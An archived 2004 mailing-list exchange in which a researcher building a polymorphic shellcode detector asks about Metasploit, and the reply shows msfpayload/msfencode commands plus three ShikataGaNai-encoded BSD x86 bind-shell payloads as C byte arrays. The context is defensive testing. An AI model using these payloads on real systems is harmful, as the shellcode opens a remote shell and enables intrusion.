dump exploit

[mmiller at hick.org (mmiller at hick.org)]

On Thu, Oct 07, 2004 at 01:47:55PM +0200, pteufl at sbox.tugraz.at wrote:
> Hi all,
> I have just read the documenation of the framework and played around with it.
> I have a question concerning execution of the exploit. When the exploit is ready
> (encoder, payload, exploit are set) the command "exploit" is used to execute the
> exploit. Is there a way to dump the complete exploit to a file: e.g. as a c
> array, or as a binary file?
> The reason for asking: I am just developing a polymorphic shellcode detection
> engine. I have already tested it with ADMmutate, Clet and JempiScodes. It would
> be interesting how it performs on exploits generated by the framework. The
> easiest way to do this would be to dump the exploit code to a file, which then
> could be used as input for the engine.

If the only thing you are interested in is the payload and not the
actual exploit itself you can use 'msfpayload' and 'msfencode' on the command 
line to encode a payload with the various encoders that are included in MSF.

$ ./msfpayload bsdix86_bind R | ./msfencode -e ShikataGaNai -t c
[*] Using Msf::Encoder::ShikataGaNai with final size of 117 bytes
"\xda\xdf\x31\xc9\xbe\xe8\x7b\xae\xb7\xb1\x18\xd9\x74\x24\xf4\x5b"
"\x31\x73\x17\x03\x73\x17\x83\x2b\x7f\x4c\x42\xc3\x80\x97\xad\xd0"
"\x39\x0d\xad\xd6\x39\xab\xfe\x5f\xde\xfa\x37\xa8\xc0\xad\x87\x06"
"\x43\x1e\xb8\xc7\xbc\x49\xe9\x6f\x53\x74\x1b\x33\xda\x9b\x71\xdb"
"\x8f\x0b\xec\xb3\x77\x53\x27\x1d\xde\x1b\xa2\x5e\x09\x0a\x62\xf6"
"\x06\xb3\x7b\x21\xef\x0a\x32\xcf\x40\xc8\x64\x99\x5f\x3a\xcf\x5c"
"\x57\x97\xb8\xb1\xb8\x6b\x51\xa5\xe9\xe9\xc8\x5b\x7f\x0e\x58\xf7"
"\x2c\x61\x66\x08\x05";
$ ./msfpayload bsdix86_bind R | ./msfencode -e ShikataGaNai -t c
[*] Using Msf::Encoder::ShikataGaNai with final size of 117 bytes
"\xd9\xca\xd9\x74\x24\xf4\xbf\x73\x19\xfa\xd8\x5e\x33\xc9\xb1\x18"
"\x31\x7e\x17\x03\x7e\x17\x83\xb5\x1d\x18\x2d\x51\x1e\xdb\xce\x62"
"\xa6\x79\xce\x64\xd7\xe4\x9f\xed\x30\x27\xe9\x1a\x5f\x18\xa9\xb4"
"\xe0\xc9\x99\x55\x1e\x3e\x88\xfd\xf0\xc3\x3a\xa1\x79\x20\x56\x49"
"\x29\xf7\xcd\x01\x95\x08\xc6\x8f\x73\x47\x83\xd0\xab\xf6\x05\x78"
"\xe4\xe7\x5a\x53\x8d\xde\x14\x59\x3e\x84\x07\x0b\xc1\xee\xe1\xca"
"\xca\x43\x9a\x03\x1a\x17\x32\x33\x4b\xb5\xab\xad\x1a\xda\x7e\x65"
"\x4e\xad\x44\x7a\xa7";
$ ./msfpayload bsdix86_bind R | ./msfencode -e ShikataGaNai -t c
[*] Using Msf::Encoder::ShikataGaNai with final size of 117 bytes
"\xbf\x23\xad\x82\xf0\x29\xc9\xdb\xc1\xd9\x74\x24\xf4\xb1\x18\x58"
"\x83\xe8\xfc\x31\x78\x0c\x03\x5b\xa1\x60\x05\xf3\xb9\x63\xe6\xc0"
"\x02\xf1\xe6\xc6\x72\x9f\xb7\x4f\x95\xae\xfe\xb8\xbb\x81\x40\x16"
"\x7c\x72\xf1\xf7\x83\xa5\xa0\x9f\x6b\x48\x52\x03\x05\xaf\x3e\xab"
"\x46\x60\xd5\xa3\x30\x7f\xfe\x6d\x97\xcf\x6b\x6e\xc0\x61\x3d\xc6"
"\x5f\x9f\x42\x31\x16\x66\x0d\xbf\x99\x3d\x3f\xe9\x26\x16\xf6\x6c"
"\x2e\xcb\x61\xa1\xff\x9f\x19\xd5\xd0\x3d\xb3\x4b\xa6\x21\x11\xc7"
"\xeb\x15\xad\x18\xdc";

As far as dumping an entire exploit to a C file, there's no real way to do
that (Yes...perlcc is not considered a 'real' way).